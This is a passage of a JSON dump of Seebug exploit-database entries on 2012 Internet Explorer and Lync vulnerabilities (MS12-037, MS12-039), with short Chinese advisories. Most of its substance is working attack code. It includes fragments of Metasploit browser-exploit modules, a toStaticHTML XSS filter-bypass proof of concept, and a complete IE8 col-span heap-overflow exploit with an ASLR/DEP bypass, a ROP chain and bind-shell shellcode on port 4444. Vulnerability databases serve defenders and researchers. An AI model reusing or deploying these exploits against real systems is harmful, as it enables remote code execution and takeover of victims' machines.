vtable1;\r\n\t\t\t}\r\n\t\t\tfunction #{crash_f}() {\r\n\t\t\t\teval("#{danger_id}").src = "";\r\n\t\t\t}\r\n\t\t\tfunction #{trigger_f}() {\r\n\t\t\t\tvar x = document.getElementsByTagName("div");\r\n\t\t\t\tvar fireOnThis = document.getElementById("#{a_id}");\r\n\t\t\t\tif (document.createEvent) {\r\n\t\t\t\t\tevObj = document.createEvent('MouseEvents');\r\n\t\t\t\t\tevObj.iniEvent('click', true, false);\r\n\t\t\t\t\tfireOnThis.dispatchEvent(evObj);\r\n\t\t\t\t} else if (document.createEventObject) {\r\n\t\t\t\t\tx[1].fireEvent('onMouseOver');\r\n\t\t\t\t\tfireOnThis.fireEvent('onclick');\r\n\t\t\t\t\tx[1].fireEvent('onMouseOut');\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tfunction #{main_f}() {\r\n\r\n\t\t\t\t#{js_spray}\r\n\t\t\t\tsetTimeout("#{trigger_f}();", 1000);\r\n\r\n\t\t\t}\r\n\t\t\t#{main_f}();\r\n\t\t\t</SCRIPT>\r\n\t\t\t</BODY>\r\n\t\t\t</HTML>\r\n\t\t|\r\n\r\n\t\thtml = html.gsub(/^\\t\\t\\t/, '')\r\n\r\n\t\tprint_status("Sending html")\r\n\t\tsend_response(cli, html, {'Content-Type'=>'text/html'})\r\n\tend\r\n\r\nend\r\n\r\n\r\n=begin\r\n* crash\r\n(a9c.998): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\n*** ERROR: Symbol file could not be found. Defaulted to export\r\nsymbols for C:\\WINDOWS\\system32\\mshtml.dll -\r\neax=1c1c1c0c ebx=00000000 ecx=02fdf588 edx=00000001 esi=02fdf588 edi=020bbaf0\r\neip=6363fcc6 esp=020bba88 ebp=020bba94 iopl=0 nv up ei pl zr na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\r\nmshtml!DllGetClassObject+0xafd09:\r\n6363fcc6 8b5070 mov edx,dword ptr [eax+70h]\r\nds:0023:1c1c1c7c=????????\r\n=end\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73100", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:51:38", "description": "CVE ID: CVE-2012-1881\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nMicrosoft Internet Explorer \u8bbf\u95ee\u5df2\u7ecf\u5220\u9664\u7684\u5bf9\u8c61\u65f6\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u4ee5\u7834\u574f\u5185\u5b58\u3002\n0\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cSEBUG\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n\r\n* \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08ms12-037\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nms12-037\uff1aCumulative Security Update for Internet Explorer (2699988)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/ms12-037.mspx", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft IE OnRowsInserted\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1881"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60211", "id": "SSV:60211", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:56:13", "description": "CVE ID: CVE-2012-1879\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nIE\u8bbf\u95ee\u672a\u5b9a\u4e49\u7684\u5185\u5b58\u4f4d\u7f6e\u65f6\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\r\n\u4ee3\u7801\u4ee5\u7834\u574f\u5185\u5b58\u3002\n0\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cSEBUG\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n\r\n* \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08ms12-037\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nms12-037\uff1aCumulative Security Update for Internet Explorer (2699988)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/ms12-037.mspx", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft IE insertAdjacentText\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u6f0f\u6d1e (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1879"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60213", "id": "SSV:60213", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T16:51:07", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "IE9, SharePoint, Lync toStaticHTML HTML Sanitizing Bypass", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-73689", "id": "SSV:73689", "sourceData": "\n toStaticHTML: The Second Encounter (CVE-2012-1858)\r\n\r\n*HTML Sanitizing Bypass -\r\n*CVE-2012-1858<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858>\r\n\r\nOriginal advisory -\r\nhttp://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\r\n\r\nIntroduction\r\n\r\nThe *toStaticHTML* component, which is found in Internet Explorer > 8,\r\nSharePoint and Lync is used to sanitize HTML fragments from dynamic and\r\npotentially malicious content.\r\n\r\nIf an attacker is able to break the filtering mechanism and pass malicious\r\ncode through this function, he/she may be able to perform HTML injection\r\nbased attacks (i.e. XSS).\r\n\r\nIt has been a year since the first\r\nencounter<http://blog.watchfire.com/wfblog/2011/07/tostatichtml-html-sanitizing-bypass.html>\r\nwas\r\npublished, we've now returned with a new bypass method.\r\n\r\nVulnerability\r\n\r\nAn attacker is able to create a specially formed CSS that will overcome *\r\ntoStaticHTML*'s security logic; therefore, after passing the specially\r\ncrafted CSS string through the *toStaticHTML* function, it will contain an\r\nexpression that triggers a JavaScript call.\r\n\r\nThe following JavaScript code demonstrates the vulnerability:\r\n\r\n*<script>document.write(toStaticHTML("<style>\r\ndiv{font-family:rgb('0,0,0)'''}foo');color=expression(alert(1));{}\r\n</style><div>POC</div>"))</script>*\r\n\r\nIn this case the function's return value would be JavaScript executable:\r\n\r\n*<style>\r\ndiv{font-family:rgb('0,0,0)''';}foo');color=expression(alert(1));{;}</style>\r\n<div>POC</div>*\r\n\r\n\r\n\r\nThe reason this code bypasses the filter engine is due to two reasons:\r\n\r\n 1. The filtering engine allows the string "expression(" to exists in\r\n "non-dangerous" locations within the CSS.\r\n 2. A bug in Internet Explorer's CSS parsing engine doesn't properly\r\n terminate strings that are opened inside brackets and closed outside of\r\n them.\r\n\r\nWhen combining these two factors the attacker is able to "confuse" the\r\nfiltering mechanism into "thinking" that a string is open when in fact it\r\nis terminated and vice versa. With this ability the attacker can trick the\r\nfiltering mechanism into entering a state of the selector context which is\r\nconsidered safer where in fact the code is just a new declaration of the\r\nsame selector, thus breaking the state machine and bypassing the filter.\r\n\r\n\r\n\r\nImpact\r\n\r\nEvery application that relies on the *toStaticHTML* component to sanitize\r\nuser supplied data had probably been vulnerable to XSS.\r\n\r\n\r\n\r\nRemediation\r\n\r\nMicrosoft has issued several updates to address this vulnerability.\r\n\r\nMS12-037 - http://technet.microsoft.com/en-us/security/bulletin/ms12-037\r\n\r\nMS12-039 - http://technet.microsoft.com/en-us/security/bulletin/ms12-039\r\n\r\nMS12-050 - http://technet.microsoft.com/en-us/security/bulletin/MS12-050\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-73689", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:51:37", "description": "CVE ID: CVE-2012-1858\r\n\r\nMicrosoft Lync \u65b0\u4e00\u4ee3\u4f01\u4e1a\u6574\u5408\u6c9f\u901a\u5e73\u53f0\uff08\u524d\u8eab\u4e3a Communications Server\uff09\uff0c\u63d0\u4f9b\u4e86\u4e00\u79cd\u5168\u65b0\u7684\u3001\u76f4\u89c2\u7684\u7528\u6237\u4f53\u9a8c\uff0c\u8de8\u8d8a PC\u3001Web\u3001\u624b\u673a\u7b49\u5176\u4ed6\u79fb\u52a8\u8bbe\u5907\uff0c\u5c06\u4e0d\u540c\u7684\u6c9f\u901a\u65b9\u5f0f\u96c6\u6210\u5230\u4e00\u4e2a\u5e73\u53f0\u4e4b\u4e2d\u3002\r\n\r\nMicrosoft Lync HTML\u8fc7\u6ee4\u65f6\u5b58\u5728\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e\uff0c\u53ef\u5141\u8bb8\u653b\u51fb\u8005\u6267\u884cXSS\u653b\u51fb\u548c\u8fd0\u884c\u811a\u672c\u3002\r\n0\r\nMicrosoft Lync 2010\r\nMicrosoft Office Communicator 2007\r\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0c\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u7981\u6b62\u4eceWebDAV\u548c\u8fdc\u7a0b\u7f51\u7edc\u5171\u4eab\u52a0\u8f7d\u5e93\u3002\r\n\r\n* \u5728\u9632\u706b\u5899\u963b\u6b62TCP\u7aef\u53e3139\u548c445\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS12-039\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS12-039\uff1aVulnerabilities in Lync Could Allow Remote Code Execution (2707956)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS12-039 .asp", "cvss3": {}, "published": "2012-06-13T00:00:00", "type": "seebug", "title": "Microsoft Lync/Office Communicator HTML\u4ee3\u7801\u8fc7\u6ee4\u6f0f\u6d1e (CVE-2012-1858) (MS12-039)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1858"], "modified": "2012-06-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60209", "id": "SSV:60209", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T21:23:45", "description": "CVE ID: CVE-2012-1523\r\n\r\nMicrosoft Internet Explorer\u662f\u5fae\u8f6f\u516c\u53f8\u63a8\u51fa\u7684\u4e00\u6b3e\u7f51\u9875\u6d4f\u89c8\u5668\u3002\r\n\r\nMicrosoft Internet Explorer \u8bbf\u95ee\u5df2\u7ecf\u5220\u9664\u7684\u5bf9\u8c61\u65f6\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u5229\u7528\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u4ee5\u7834\u574f\u5185\u5b58\u3002\n0\nMicrosoft Internet Explorer 9.x\r\nMicrosoft Internet Explorer 8.x\r\nMicrosoft Internet Explorer 7.x\r\nMicrosoft Internet Explorer 6.x\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n\u5982\u679c\u60a8\u4e0d\u80fd\u7acb\u523b\u5b89\u88c5\u8865\u4e01\u6216\u8005\u5347\u7ea7\uff0cSebug\u5efa\u8bae\u60a8\u91c7\u53d6\u4ee5\u4e0b\u63aa\u65bd\u4ee5\u964d\u4f4e\u5a01\u80c1\uff1a\r\n\r\n* \u8bbe\u7f6e\u4e92\u8054\u7f51\u548c\u5185\u8054\u7f51\u5b89\u5168\u533a\u57df\u8bbe\u7f6e\u4e3a\u201c\u9ad8\u201d\r\n\r\n* \u914d\u7f6eIE\u5728\u8fd0\u884c\u6d3b\u52a8\u811a\u672c\u4e4b\u524d\u63d0\u793a\u6216\u76f4\u63a5\u7981\u7528\u3002\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08ms12-037\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nms12-037\uff1aCumulative Security Update for Internet Explorer (2699988)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/ms12-037.mspx", "cvss3": {}, "published": "2012-06-16T00:00:00", "type": "seebug", "title": "Microsoft Internet Explorer \u4e2d\u5fc3\u5143\u7d20\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e (MS12-037)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1523"], "modified": "2012-06-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60218", "id": "SSV:60218", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T17:58:26", "description": "No description provided by source.", "cvss3": {}, "published": "2013-01-10T00:00:00", "title": "Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60566", "id": "SSV:60566", "sourceData": "\n \r\n \r\n<html>\r\n<body>\r\n<div id="evil"></div>\r\n<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>\r\n<script language='javascript'>\r\n \r\nfunction strtoint(str) {\r\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\r\n}\r\n \r\nvar free = "EEEE";\r\nwhile ( free.length < 500 ) free += free;\r\n \r\nvar string1 = "AAAA";\r\nwhile ( string1.length < 500 ) string1 += string1;\r\n \r\nvar string2 = "BBBB";\r\nwhile ( string2.length < 500 ) string2 += string2;\r\n \r\nvar fr = new Array();\r\nvar al = new Array();\r\nvar bl = new Array();\r\n \r\nvar div_container = document.getElementById("evil");\r\ndiv_container.style.cssText = "display:none";\r\n \r\nfor (var i=0; i < 500; i+=2) {\r\n fr[i] = free.substring(0, (0x100-6)/2);\r\n al[i] = string1.substring(0, (0x100-6)/2);\r\n bl[i] = string2.substring(0, (0x100-6)/2);\r\n var obj = document.createElement("button");\r\n div_container.appendChild(obj);\r\n}\r\n \r\nfor (var i=200; i<500; i+=2 ) {\r\n fr[i] = null;\r\n CollectGarbage();\r\n}\r\n \r\nfunction heapspray(cbuttonlayout) {\r\n CollectGarbage();\r\n var rop = cbuttonlayout + 4161; // RET\r\n var rop = rop.toString(16);\r\n var rop1 = rop.substring(4,8);\r\n var rop2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 11360; // POP EBP\r\n var rop = rop.toString(16);\r\n var rop3 = rop.substring(4,8);\r\n var rop4 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\r\n var rop = rop.toString(16);\r\n var rop5 = rop.substring(4,8);\r\n var rop6 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12377; // POP EBX\r\n var rop = rop.toString(16);\r\n var rop7 = rop.substring(4,8);\r\n var rop8 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 642768; // POP EDX\r\n var rop = rop.toString(16);\r\n var rop9 = rop.substring(4,8);\r\n var rop10 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\r\n var rop = rop.toString(16);\r\n var rop11 = rop.substring(4,8);\r\n var rop12 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 5504544; // Writable location\r\n var rop = rop.toString(16);\r\n var writable1 = rop.substring(4,8);\r\n var writable2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12462; // POP EDI\r\n var rop = rop.toString(16);\r\n var rop13 = rop.substring(4,8);\r\n var rop14 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\r\n var rop = rop.toString(16);\r\n var rop15 = rop.substring(4,8);\r\n var rop16 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 63776; // JMP EAX\r\n var rop = rop.toString(16);\r\n var jmpeax1 = rop.substring(4,8);\r\n var jmpeax2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 85751; // POP EAX\r\n var rop = rop.toString(16);\r\n var rop17 = rop.substring(4,8);\r\n var rop18 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 4936; // VirtualProtect()\r\n var rop = rop.toString(16);\r\n var vp1 = rop.substring(4,8);\r\n var vp2 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\r\n var rop = rop.toString(16);\r\n var rop19 = rop.substring(4,8);\r\n var rop20 = rop.substring(0,4); // } RET\r\n \r\n var rop = cbuttonlayout + 234657; // PUSHAD\r\n var rop = rop.toString(16);\r\n var rop21 = rop.substring(4,8);\r\n var rop22 = rop.substring(0,4); // } RET\r\n \r\n \r\n var rop = cbuttonlayout + 408958; // PUSH ESP\r\n var rop = rop.toString(16);\r\n var rop23 = rop.substring(4,8);\r\n var rop24 = rop.substring(0,4); // } RET\r\n \r\n var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP\r\n shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP\r\n shellcode+= unescape("%u1024%u0000"); // Size 0x00001024\r\n shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX\r\n shellcode+= unescape("%u0040%u0000"); // 0x00000040\r\n shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX\r\n shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location\r\n shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI\r\n shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET\r\n shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI\r\n shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX\r\n shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX\r\n shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()\r\n shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\r\n shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD\r\n shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n shellcode+= unescape("%u9090%u9090"); // crap\r\n \r\n // Bind shellcode on 4444 :)\r\n shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +\r\n "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +\r\n "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +\r\n "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +\r\n "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +\r\n "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +\r\n "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +\r\n "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +\r\n "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +\r\n "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +\r\n "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +\r\n "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +\r\n "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +\r\n "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +\r\n "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +\r\n "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +\r\n "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +\r\n "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +\r\n "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +\r\n "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +\r\n "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +\r\n "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +\r\n "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +\r\n "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +\r\n "%u006a%uff53%u41d5");\r\n \r\n \r\n \r\n while (shellcode.length < 100000)\r\n shellcode = shellcode + shellcode;\r\n \r\n var onemeg = shellcode.substr(0, 64*1024/2);\r\n \r\n for (i=0; i<14; i++) {\r\n onemeg += shellcode.substr(0, 64*1024/2);\r\n }\r\n \r\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\r\n \r\n var spray = new Array();\r\n \r\n for (i=0; i<100; i++) {\r\n spray[i] = onemeg.substr(0, onemeg.length);\r\n }\r\n}\r\n \r\nfunction leak(){\r\n var leak_col = document.getElementById("132");\r\n leak_col.width = "41";\r\n leak_col.span = "19";\r\n}\r\n \r\nfunction get_leak() {\r\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\r\n str_addr = str_addr - 1410704;\r\n setTimeout(function(){heapspray(str_addr)}, 200); \r\n}\r\n \r\nfunction trigger_overflow(){\r\n var evil_col = document.getElementById("132");\r\n evil_col.width = "1178993";\r\n evil_col.span = "44";\r\n}\r\n \r\nsetTimeout(function(){leak()}, 300);\r\nsetTimeout(function(){get_leak()},700);\r\n//setTimeout(function(){heapspray()}, 900);\r\nsetTimeout(function(){trigger_overflow()}, 1200);\r\n \r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-60566", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T14:35:40", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Microsoft Internet Explorer Fixed Table Col Span Heap Overflow", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1876"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-74062", "id": "SSV:74062", "sourceData": "\n ##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::Remote::BrowserAutopwn\r\n\tautopwn_info({\r\n\t\t:os_name => OperatingSystems::WINDOWS,\r\n\t\t:ua_minver => "8.0",\r\n\t\t:ua_maxver => "8.0",\r\n\t\t:rank => NormalRanking, # reliable memory corruption\r\n\t\t:javascript => true\r\n\t})\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Internet Explorer Fixed Table Col Span Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a heap overflow vulnerability in Internet Explorer caused\r\n\t\t\t\tby an incorrect handling of the span attribute for col elements from a fixed table,\r\n\t\t\t\twhen they are modified dynamically by javascript code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Alexandre Pelletier', # Vulnerability analysis\r\n\t\t\t\t\t'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module\r\n\t\t\t\t\t'binjo', # Metasploit module\r\n\t\t\t\t\t'sinn3r', # Help with the Metasploit module\r\n\t\t\t\t\t'juan' # Help with the Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2012-1876' ],\r\n\t\t\t\t\t[ 'OSVDB', '82866'],\r\n\t\t\t\t\t[ 'BID', '53848' ],\r\n\t\t\t\t\t[ 'MSB', 'MS12-037' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => "\\x00",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', {} ],\r\n\t\t\t\t\t[ 'IE 8 on Windows XP SP3 with msvcrt 